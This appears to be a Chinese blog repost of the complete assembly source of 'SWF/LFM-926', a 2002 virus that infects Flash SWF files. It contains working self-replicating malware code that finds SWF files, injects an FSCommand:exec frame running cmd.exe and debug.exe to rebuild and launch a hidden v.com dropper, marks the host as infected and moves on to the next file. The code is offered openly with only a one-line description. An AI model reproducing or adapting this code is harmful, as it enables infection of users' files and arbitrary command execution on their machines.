本文介绍了一种针对SWF文件的病毒,该病毒通过修改Flash文件的头部信息并插入恶意代码来实现感染。它利用标准格式将病毒从二进制转换为十六进制字符,并插入到宿主文件中。
SWF/LFM-926 Virus:
; ------------------
; Description: WinNT/XP Virus dropper for Flash .SWF files!
; Masm Version 6.11: ML.EXE SWF.ASM
; Virus Size: 926 bytes
; Infection Size: 3247 bytes.
; Last Edit: 01/08/2002
; --------------------------------- Begin Source Code ------------------------------------
.286
.model tiny
.code
org 100h Entry: jmp Start
VIR_SIZE equ Virus_End-Entry
DTA db 128 dup(0) ; Offset DTA+30 = filename
HANDLE dw ? ; Handle to host file
PTR1 dd 0 ; Segment address of the created memory block
PATH db "*.SWF",0 ; File mask
BINARY db "v.com",0 ; Binary code
HEX db "0123456789ABCDEF" ; Binary to hex
; Flash header block.
; -------------------
SIGN_FW dw ? ; SWF file format
SIGN_S db ?
VERSION_NUM db ?
FILE_LENGTH dw ?
dw ?
STATIC_HDR_SIZE equ $-SIGN_FW
RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isnt static. ;(
RECT_BUF_SIZE equ $-RECT_BUF
HDR_SIZE dw ? ; Holds the true header size!
; Start of Viral Frame 0.
; -----------------------
Drop_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes!
TAG_LENGTH dw 0 ; (ACTION LENGTH+3)+1[END_TAG]
dw 0
db 083h ; ActionGetUrl Tag
ACTION_LENGTH dw 0 ; (Drop_BEGIN_SIZE-9)+(SUM OF Drop_MIDDLE)+(Drop_END_SIZE)
db FSCommand:exec
db 000h
db cmd.exe
db 009h ; chr(9) is Flash code for a space character.
db /c
db 009h
db echo
db 009h
db Loading.Flash.Movie...
db &
db (echo
db 009h
db n
db 009h
db v.com&echo
db 009h
db a
db 009h
db 100&
Drop_BEGIN_SIZE equ $-Drop_BEGIN
Drop_MIDDLE db echo
db 009h
db db
db 009h
db 71 dup(,) ; db XX,...,XX where XXs are viral hex codes.
db &
Drop_MIDDLE_SIZE equ $-Drop_MIDDLE
Drop_END db &echo.&echo
db 009h
db rcx&echo
db 009h
db 39E ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes.
db &echo
db 009h
db w&echo
db 009h
db q)|debug.exe>nul&start
db 009h
db /b
db 009h
db v.com
db 000h ; StringEnd Tag
Drop_END_SIZE equ $-Drop_END
; End of Viral Frame 0.
; ---------------------
END_TAG db 001h ; Action code 0x01 = tagshowframe Tag
Start:
mov ax,(VIR_SIZE+0fh)
shr ax,4
shl ax,1
mov bx,ax ; Allocate (VirusSize*2)
mov ah,4ah
int 21h ; Resize block
jc ExProg
mov dx,offset DTA ; Set DTA operation
mov ah,1ah
int 21h
mov cx,07h
mov dx,offset PATH
mov ah,4eh ; FindFirst
int 21h
jc ExProg
jmp Infect
Cycle:
mov dx,offset PATH
mov ah,4fh ; FindNext
int 21h
jc ExProg
jmp Infect
ExProg:
mov ax,4301h ; Hide v.com
mov cx,02h
mov dx,offset BINARY
int 21h
mov ax,4c00h ; End program
int 21h
Infect:
mov byte ptr DTA[30+12],$
mov dx,offset (DTA+30)
mov ax,3d02h ; Open host file
int 21h
jc ExProg
mov [HANDLE],ax ; Save file handle
mov ax,3f00h ; Read file Header
mov dx,offset SIGN_FW
mov bx,[HANDLE]
mov cx,(STATIC_HDR_SIZE+RECT_BUF_SIZE)
int 21h
jc ExProg
cmp word ptr SIGN_FW,WF ; Check for a valid Flash SWF file.
jne Cycle ; Try another file ...
cmp byte ptr SIGN_S,S
jne Cycle
cmp byte ptr VERSION_NUM,099h ; Already infected?
je Cycle
mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag.
xor di,di ; Seems to always exist directly after the header.
next: cmp byte ptr RECT_BUF[di],043h
jne not_found
cmp byte ptr RECT_BUF[di+1],002h
jne not_found
jmp found
not_found:
inc di
loop next
jmp Cycle
found:
mov word ptr HDR_SIZE,STATIC_HDR_SIZE
add word ptr HDR_SIZE,di ; Compute the header size
mov ax,4200h ; Reset file ptr right after Flash header
xor cx,cx
mov dx,[HDR_SIZE]
int 21h
jc ExProg
push bx
mov ax,word ptr FILE_LENGTH
add ax,15
shr ax,4
mov bx,ax
mov ah,48h ; Allocate memory for target host file
int 21h
pop bx
jc ExProg
mov word ptr PTR1[2],ax ; Save pointer to allocated block
mov cx,word ptr FILE_LENGTH
sub cx,[HDR_SIZE]
mov ah,3fh ; Read host file into memory block
push ds
lds dx,[PTR1]
int 21h
pop ds
jc ExProg
mov ax,4200h ; Reset file ptr to the middle code section
xor cx,cx
mov dx,[HDR_SIZE]
add dx,Drop_BEGIN_SIZE
int 21h
jc ExProg
;
; The following code is a key technique. It simply converts the
; virus from binary to hex characters and then inserts them into the host
; using a standard format that DEBUG.EXE expects! Flash only really
; allows plain text, so this satisfies that condition.
;
mov word ptr ACTION_LENGTH,(Drop_BEGIN_SIZE-9+Drop_END_SIZE)
push bx
mov cx,VIR_SIZE
xor si,si
xor di,di
ToHex:
mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex humber
mov al,byte ptr Entry[si]
mov ah,al
and al,00001111y
xlat
mov Drop_MIDDLE[STATIC_HDR_SIZE+di+1],al
shr ax,12
xlat
mov Drop_MIDDLE[STATIC_HDR_SIZE+di],al
inc si
inc di
inc di
inc di
mov ax,si
mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line.
div bl
or ah,ah
jnz cont
push cx
xor di,di
add word ptr ACTION_LENGTH,Drop_MIDDLE_SIZE
mov bx,[HANDLE] ; Write hex dump entry XX,...,XX
mov dx,offset Drop_MIDDLE
mov cx,Drop_MIDDLE_SIZE
mov ax,4000h
int 21h
jc ExProg
pop cx
cont:
loop ToHex
pop bx
or di,di
jz no_remainder
mov dx,offset Drop_MIDDLE
mov cx,di
add cx,7 ; STATIC_HDR_SIZE-1
add word ptr ACTION_LENGTH,cx
mov ax,4000h ; Write remainder hex dump entry XX,...,XX
int 21h
jc ExProg
no_remainder:
mov dx,offset Drop_END
mov cx,Drop_END_SIZE+1
mov ax,4000h ; Write end code and end of frame tag(01) into host
int 21h
jc ExProg
mov cx,word ptr FILE_LENGTH
sub cx,[HDR_SIZE]
mov ax,4000h ; Write host code directly after viral code.
push ds
lds dx,[PTR1]
int 21h
pop ds
jc ExProg
; Patch the header with new viral values.
mov cx,word ptr ACTION_LENGTH
add cx,4
mov word ptr TAG_LENGTH,cx
add cx,6
add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6)
; Set infection marker
mov byte ptr VERSION_NUM,099h
mov di,[HDR_SIZE]
inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1
mov ax,4200h ; Re-wind to start of file
xor cx,cx
xor dx,dx
int 21h
jc ExProg
mov dx,offset SIGN_FW
mov cx,[HDR_SIZE]
mov ax,4000h ; Write updated viral header
int 21h
jc ExProg
mov dx,offset Drop_BEGIN
mov cx,Drop_BEGIN_SIZE
mov ax,4000h ; Write begin code into host
int 21h
jc ExProg
mov ah,49h ; Free memory block
mov es,word ptr PTR1[2]
int 21h
jc ExProg
mov ax,3e00h ; Close file
int 21h
jc ExProg
jmp Cycle ; DONE! Try to infect another.
Virus_End:
end Entry
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
